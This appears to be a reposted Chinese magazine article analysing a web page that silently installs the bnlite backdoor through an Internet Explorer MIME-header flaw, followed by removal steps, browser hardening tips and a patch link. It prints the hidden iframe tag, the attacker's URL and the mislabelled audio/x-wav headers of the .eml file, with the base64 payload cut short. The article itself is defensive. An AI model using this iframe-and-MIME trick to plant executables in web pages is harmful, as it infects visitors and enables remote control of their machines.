編者按:上期我們介紹的是“萬花谷”病毒攻防戰(zhàn),其實(shí)互聯(lián)網(wǎng)上類似的網(wǎng)站還很多(計(jì)算機(jī)愛好者,學(xué)習(xí)計(jì)算機(jī)基礎(chǔ),電腦入門,請(qǐng)到本站,我站同時(shí)提供計(jì)算機(jī)基礎(chǔ)知識(shí)教程,計(jì)算機(jī)基礎(chǔ)知識(shí)試題供大家學(xué)習(xí)和使用),,只要有帶新的病毒的網(wǎng)站出現(xiàn),我們就有義務(wù)告知大家。如果大家有網(wǎng)絡(luò)安全方面的稿件,請(qǐng)發(fā)xiongjie@cpcw.Com信箱,我們將以最快速度把實(shí)用性強(qiáng)的文章刊登出來。
一、切身體驗(yàn)
在進(jìn)入木馬網(wǎng)頁的過程中,鼠標(biāo)奇怪地變成沙漏形狀,看來的確是有程序在運(yùn)行。打開計(jì)算機(jī)的任務(wù)管理器,可以看到多了一個(gè)wincfg.Exe的進(jìn)程。進(jìn)程對(duì)應(yīng)的文件在Win2000下是c\winnt\wincfg.Exe,在Win98下是c\windows\wincfg.Exe。
運(yùn)行注冊(cè)表編輯器regedit,在“HKEY_LOCAL_M(jìn)ACHINE\SOFTWARE\Microsoft\Windows\CurrentVerion\Run”下發(fā)現(xiàn)wincfg.Exe,原來它將自己登記在注冊(cè)表開機(jī)啟動(dòng)項(xiàng)中,這樣每次開機(jī)都會(huì)自動(dòng)運(yùn)行wincfg.Exe。(如圖)
注:給你下套的人可以自己設(shè)定這個(gè)木馬的啟動(dòng)鍵名和注冊(cè)文件名,注冊(cè)文件名也就是運(yùn)行時(shí)進(jìn)程里的名稱,因此大家看到的結(jié)果可能不相同。
運(yùn)行金山毒霸,報(bào)告發(fā)現(xiàn)“backdoor bnlite”,哦,原來是木馬bnlite服務(wù)端改名為wincfg.Exe。別看這個(gè)木馬服務(wù)端程序不大(僅有6.5K),但它的功能可不少:具有ICQ通報(bào)功能、遠(yuǎn)程刪除服務(wù)端功能、設(shè)定端口和運(yùn)行名稱、上傳下載……如果你中了該木馬,那么木馬控制端完全可以通過這個(gè)木馬在你的電腦上建立一個(gè)隱藏的FTP服務(wù)器,別人就有最大權(quán)限進(jìn)入你的電腦了!這樣控制你的電腦將非常容易!
木馬是如何下載到瀏覽了該主頁的計(jì)算機(jī)中、并運(yùn)行起來的呢?在IE中點(diǎn)擊“工具”→“Internet選項(xiàng)”→“安全”→“自定義安全級(jí)別”,將ActiveX相關(guān)選項(xiàng)全部都禁用,再瀏覽該網(wǎng)頁,wincfg.Exe還是下載并運(yùn)行了!看來這和ActiveX無關(guān)。在“自定義安全級(jí)別”中有關(guān)文件下載的選項(xiàng)都禁止,再瀏覽該網(wǎng)頁,這回wincfg.Exe不再下載了。
二、問題揭示
我們來看看wincfg.Exe是如何下載到瀏覽者計(jì)算機(jī)上的,在該網(wǎng)頁上點(diǎn)擊鼠標(biāo)右鍵,選擇其中的“查看源代碼”,在網(wǎng)頁代碼最后面發(fā)現(xiàn)了可疑的語句:
<iframe src=wincfg.Eml width=1 height=1>
注意到其中的“wincfg.Eml”了嗎?大家都知道eml為郵件格式,網(wǎng)頁中要eml文件干什么呢?非常可疑!在IE瀏覽器中輸入:http//shirf.51.Net/wincfg.Eml,再看看任務(wù)管理器,wincfg.Exe進(jìn)程又回來了,原來問題就在這個(gè)文件上!既然問題在這文件上,當(dāng)然得想辦法得到這個(gè)文件看看了。用螞蟻把文件下載下來,鼠標(biāo)剛點(diǎn)上去,wincfg.Exe又被執(zhí)行了,真是陰魂不散啊!
打開wincfg.Eml,發(fā)現(xiàn)其關(guān)鍵內(nèi)容如下:
Content-Type audio/x-wav name=“wincfg.Exe” ★這一句定義了文件名稱,在此為wincfg.Exe
Content-Transfer-Encoding base64 ★定義了代碼格式為base64
Content-ID <THE-CID> ★從這里開始才是代碼的起步
TVqQAAMAAAAEAAAA//8AAL……以下刪掉一大節(jié) ★這些是wincfg.Exe經(jīng)過base64編碼的內(nèi)容
上面加了“★”的部分為注釋內(nèi)容。這個(gè)以base64方式編碼的文件,會(huì)在你瀏覽網(wǎng)頁時(shí)編譯成wincfg.Exe文件并運(yùn)行,這就是瀏覽該網(wǎng)頁會(huì)中木馬的原因!至此我就明白了,其實(shí),所謂的瀏覽網(wǎng)頁會(huì)中木馬,只是網(wǎng)頁制作者利用了微軟IE瀏覽器中存在的漏洞進(jìn)行攻擊的一個(gè)案例而已,說白了就是利用了錯(cuò)誤的MIMEMultipurpose Internet Mail Extentions,多用途的網(wǎng)際郵件擴(kuò)充協(xié)議頭進(jìn)行攻擊。
三、真相大白
現(xiàn)在,再回過頭來看看我所中的木馬是怎么回事。其實(shí),wincfg.Exe這個(gè)文件在這里相當(dāng)于郵件的附件,從我們所列的代碼中可以看到,攻擊者把wincfg.Exe的類型定義為audio/x-wav,由于郵件的類型為audio/x-wav時(shí),IE存在的這個(gè)錯(cuò)誤的MIME頭漏洞會(huì)將附件認(rèn)為是音頻文件,并自動(dòng)嘗試打開,結(jié)果導(dǎo)致郵件文件wincfg.Eml中的附件wincfg.Exe(木馬)被執(zhí)行。在Win2000下,即使是用鼠標(biāo)點(diǎn)擊下載下來的wincfg.Eml,或是拷貝粘貼該文件,都會(huì)導(dǎo)致wincfg.Eml中的附件被運(yùn)行,微軟的這個(gè)漏洞可真是害人不淺啊。現(xiàn)在看來,原先那些攻擊者想方設(shè)法欺騙被攻擊目標(biāo)執(zhí)行修改過的木馬等后門程序,是多么落后的手段啊!如今,利用微軟“創(chuàng)造”的這個(gè)大漏洞來進(jìn)行攻擊,是多么簡單、多么容易啊!唯一的條件就是被攻擊目標(biāo)使用IE5.0及以上版本中的一種,使用IE瀏覽器的用戶到底有多少呢?看看你身邊的朋友就知道答案了!
四、解決辦法
1點(diǎn)擊“開始”→“運(yùn)行”,在彈出的對(duì)話框中輸入“regedit”,回車。然后展開注冊(cè)表到“HKEY_LOCAL_M(jìn)ACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下刪除wincfg.Exe;
2到你的計(jì)算機(jī)的系統(tǒng)目錄下,刪除其中的wincfg.Exe文件;
3重新啟動(dòng)機(jī)器,就一切OK了!
五、預(yù)防方法
1.IE和Outlook的用戶。
1在IE的“工具→Internet選項(xiàng)→安全→Internet區(qū)域的安全級(jí)別”,把安全極別由“中”改為“高”。
2點(diǎn)擊“自定義級(jí)別”按鈕,在彈出的窗口中,禁用“對(duì)標(biāo)記為可安全執(zhí)行腳本的ActiveX控件執(zhí)行腳本”、“活動(dòng)腳本”和“文件下載”功能。
3禁用所有的ActiveX控制和插件。
4將資源管理器設(shè)置成“始終顯示擴(kuò)展名”。
5禁止以WEB方式使用資源管理器。
6取消“下載后確認(rèn)打開”這種擴(kuò)展名屬性設(shè)置。
2.不要受陌生人的誘惑打開別人給你的URL,如果確實(shí)想看,可以通過一些下載工具把頁面下載下來,然后用記事本等一些文本編輯工具打開查看代碼。
3.微軟公司為該漏洞提供了一個(gè)補(bǔ)丁,趕快到下面所列出的URL去看看吧:
http://www.Microsoft.Com/windows/IE/download/critical/Q290108/default.Asp
上海廣樂網(wǎng)絡(luò)科技有限公司 
滬ICP備14038021號(hào)-2 版權(quán)所有. 上海市市轄區(qū)浦東新區(qū)盛夏路666號(hào)盛銀大廈E棟 13151091625
